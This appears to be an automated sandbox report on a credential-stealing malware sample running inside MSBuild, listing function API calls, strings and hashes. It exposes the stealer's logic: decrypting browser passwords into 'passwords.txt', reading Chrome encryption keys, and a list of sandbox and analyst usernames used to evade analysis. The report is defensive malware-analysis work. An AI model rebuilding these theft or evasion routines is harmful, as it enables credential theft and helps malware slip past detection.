Opcode Fuzzy Hash: 81b757bedadb6aa414f3cbb5558a59dfea264c2a9b68c96a8667cab582a7df29
Instruction Fuzzy Hash: B621CDB4C01701DFD724DFA4F949A443BB4BF08316F10916AF41887262E7B4D9818F5E

Function 0040DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD

GetProcessHeap.KERNEL32(00000008,?,75AA5460,?,00000000), ref: 0040DD04
HeapAlloc.KERNEL32(00000000), ref: 0040DD0B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD20
HeapFree.KERNEL32(00000000), ref: 0040DD27
strcpy_s.MSVCRT ref: 0040DD43
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD55
HeapFree.KERNEL32(00000000), ref: 0040DD62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DD93
HeapFree.KERNEL32(00000000), ref: 0040DD9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DDA1
HeapAlloc.KERNEL32(00000000), ref: 0040DDA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDBD
HeapFree.KERNEL32(00000000), ref: 0040DDC4
strcpy_s.MSVCRT ref: 0040DDDA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDEC
HeapFree.KERNEL32(00000000), ref: 0040DDF3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE11
HeapFree.KERNEL32(00000000), ref: 0040DE18
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE1F
HeapAlloc.KERNEL32(00000000), ref: 0040DE26
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE3B
HeapFree.KERNEL32(00000000), ref: 0040DE42
strcpy_s.MSVCRT ref: 0040DE52
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE64
HeapFree.KERNEL32(00000000), ref: 0040DE6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE93
HeapFree.KERNEL32(00000000), ref: 0040DE9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DEA1
HeapAlloc.KERNEL32(00000000), ref: 0040DEA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEC3
HeapFree.KERNEL32(00000000), ref: 0040DECA
strcpy_s.MSVCRT ref: 0040DEDD
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEEF
HeapFree.KERNEL32(00000000), ref: 0040DEF6
lstrlenA.KERNEL32(00000000), ref: 0040DEFF
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DF15
HeapAlloc.KERNEL32(00000000), ref: 0040DF1C
lstrlenA.KERNEL32(00000000), ref: 0040DF34

Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

strcpy_s.MSVCRT ref: 0040DF75
GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0040DF9B
HeapFree.KERNEL32(00000000), ref: 0040DFA8
lstrlenA.KERNEL32(?), ref: 0040DFAD
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040DFBC
HeapAlloc.KERNEL32(00000000), ref: 0040DFC3
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFD7
HeapFree.KERNEL32(00000000), ref: 0040DFDE
strcpy_s.MSVCRT ref: 0040DFEC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFF9
HeapFree.KERNEL32(00000000), ref: 0040E000
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E035
HeapFree.KERNEL32(00000000), ref: 0040E03C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040E043
HeapAlloc.KERNEL32(00000000), ref: 0040E04A
strcpy_s.MSVCRT ref: 0040E065
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E077
HeapFree.KERNEL32(00000000), ref: 0040E07E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E122
HeapFree.KERNEL32(00000000), ref: 0040E129
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E173
HeapFree.KERNEL32(00000000), ref: 0040E17A

Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
Part of subcall function 0040DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
Part of subcall function 0040DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
String ID:
API String ID: 838878465-0
Opcode ID: 944c7dbbb483e652ea0c5082bda78fe99dba96f91c80018fac581aa229666c1c
Instruction ID: 55d57addeb693bec13dd2aca0e3f8bc9cd2252af75e58958267656c534a8cbc3
Opcode Fuzzy Hash: 944c7dbbb483e652ea0c5082bda78fe99dba96f91c80018fac581aa229666c1c
Instruction Fuzzy Hash: 36E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54

Function 0040A916 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A922

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004373A4,0043680F), ref: 0040A9C1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9D9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9E1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9ED
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA09
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA15
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA1C
StrStrA.SHLWAPI(0040B824,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA2D
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA47
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA5A
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA64
lstrcatA.KERNEL32(00000000,004373A8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA70
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA7A
lstrcatA.KERNEL32(00000000,004373AC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA86
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA93
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA9B
lstrcatA.KERNEL32(00000000,004373B0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAA7
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAB7
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAC7
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AADA

Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
Part of subcall function 0040A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
Part of subcall function 0040A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
Part of subcall function 0040A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
Part of subcall function 0040A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
Part of subcall function 0040A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
Part of subcall function 0040A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAE9
lstrcatA.KERNEL32(00000000,004373B4,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAF5
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB05
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB15
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB28

Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB37
lstrcatA.KERNEL32(00000000,004373B8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB43
lstrcatA.KERNEL32(00000000,004373BC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB4F
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB5F
lstrlenA.KERNEL32(00000000), ref: 0040AB7D
CloseHandle.KERNEL32(?), ref: 0040ABAC
NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040ABB2

Strings

passwords.txt, xrefs: 0040AB89
pe, xrefs: 0040A931

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
String ID: passwords.txt$pe
API String ID: 2725232238-1761351166
Opcode ID: 724b19f77cfbadd78dc1faf4d27645deae132dfd84264f190695712cfec16b52
Instruction ID: f290e10536fc29165bd90020ec0e89fb1ec55b4f39b8cd3f3e59d108c05ab857
Opcode Fuzzy Hash: 724b19f77cfbadd78dc1faf4d27645deae132dfd84264f190695712cfec16b52
Instruction Fuzzy Hash: 4A71A331500215ABCF15EFA1ED4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6

Function 00424C37 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424C3F
__mtterm.LIBCMT ref: 00424C4B

Part of subcall function 0042490A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0042491B
Part of subcall function 0042490A: TlsFree.KERNEL32(FFFFFFFF), ref: 00424935

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424C61
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424C6E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424C7B
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424C88
TlsAlloc.KERNEL32 ref: 00424CD8
TlsSetValue.KERNEL32(00000000), ref: 00424CF3
__init_pointers.LIBCMT ref: 00424CFD
EncodePointer.KERNEL32 ref: 00424D0E
EncodePointer.KERNEL32 ref: 00424D1B
EncodePointer.KERNEL32 ref: 00424D28
EncodePointer.KERNEL32 ref: 00424D35
DecodePointer.KERNEL32(Function_00024A8E), ref: 00424D56
__calloc_crt.LIBCMT ref: 00424D6B
DecodePointer.KERNEL32(00000000), ref: 00424D85
__initptd.LIBCMT ref: 00424D90
GetCurrentThreadId.KERNEL32 ref: 00424D97

Strings

FlsGetValue, xrefs: 00424C63
FlsAlloc, xrefs: 00424C5B
FlsFree, xrefs: 00424C7D
FlsSetValue, xrefs: 00424C70
KERNEL32.DLL, xrefs: 00424C3A

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction ID: 94530a44bd353d5e48263630fbc58cc49e13d953e031ca61b59d9614a8241a7b
Opcode Fuzzy Hash: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction Fuzzy Hash: CC316B31E013649ACB22AF7ABC0860A3BA4EF84762B51063BE410D32B1DFB8C440DF4D

Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00401A13
lstrcmpiA.KERNEL32(0043AC84,?), ref: 00401A2E

Strings

virus, xrefs: 004019EB
sandbox, xrefs: 004019C3
milozs, xrefs: 0040199B
John Doe, xrefs: 004019F5
Hong Lee, xrefs: 00401973
Johnson, xrefs: 00401987
WDAGUtilityAccount, xrefs: 004019FF
malware, xrefs: 004019CD
maltest, xrefs: 004019D7
Peter Wilson, xrefs: 004019A5
user, xrefs: 004019B9
HAPUBWS, xrefs: 00401969
timmy, xrefs: 004019AF
Emily, xrefs: 0040195F
IT-ADMIN, xrefs: 0040197D
Sand box, xrefs: 00401955
CurrentUser, xrefs: 0040194B
test user, xrefs: 004019E1
Miller, xrefs: 00401991

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: da99fce13d188c8d449195af6028c632b9155eeec286f17b5d3ae48a6bd12366
Instruction ID: d1bae68e67e499abaef637c9412b49fd07aa939d7eda53f7808c85b94d013073
Opcode Fuzzy Hash: da99fce13d188c8d449195af6028c632b9155eeec286f17b5d3ae48a6bd12366
Instruction Fuzzy Hash: FD2103B194126C8BCB60CF15DD486DDB7B4BB59309F00B1DAD489AA250C7B84FD9CF49

Function 004139C2 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,00417854), ref: 004139D7
ExitProcess.KERNEL32 ref: 004139E2
strtok_s.MSVCRT ref: 004139F3

Strings

TxA, xrefs: 004139EC, 004139EF
block, xrefs: 004139CB

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: TxA$block
API String ID: 3407564107-2373637923
Opcode ID: 0968e0b0628705e8ac1d29d17911e38a67c685f80fe145dba11dcdbcfe66eece
Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
Opcode Fuzzy Hash: 0968e0b0628705e8ac1d29d17911e38a67c685f80fe145dba11dcdbcfe66eece
Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58

Function 0041B983 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0041C66E,?), ref: 0041B988
StrCmpCA.SHLWAPI(74DE83C0,0043613C), ref: 0041B9B6
StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0041B9C6
StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0041B9D2
StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0041B9DE
StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0041B9EA
StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0041B9F6
StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0041BA02
StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0041BA0E

Strings

.arj, xrefs: 0041B9F0
.tgz, xrefs: 0041BA08
.arc, xrefs: 0041B9D8
.lzh, xrefs: 0041B9E4
.gz, xrefs: 0041B9FC
.zoo, xrefs: 0041B9CC
.zip, xrefs: 0041B9C0

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 04d37d8bf72ca36d8f635762d850a2ddb5f423679fb0dd0bb54afd8eff972df8
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction Fuzzy Hash: D601B571691367B15A2226316E41FBF1E6CCD86F80F15202BED00E2289EB4C9C8356FE

Function 0041580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415845
_memset.LIBCMT ref: 00415856

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041595C,?), ref: 004121F2

StrStrA.SHLWAPI(00000000), ref: 0041596A
GlobalFree.KERNEL32(?), ref: 00415A8C

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

lstrcatA.KERNEL32(?,00000000), ref: 00415A18
StrCmpCA.SHLWAPI(?,00436645), ref: 00415A35
lstrcatA.KERNEL32(?,?), ref: 00415A54
lstrcatA.KERNEL32(?,00436A8C), ref: 00415A65

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

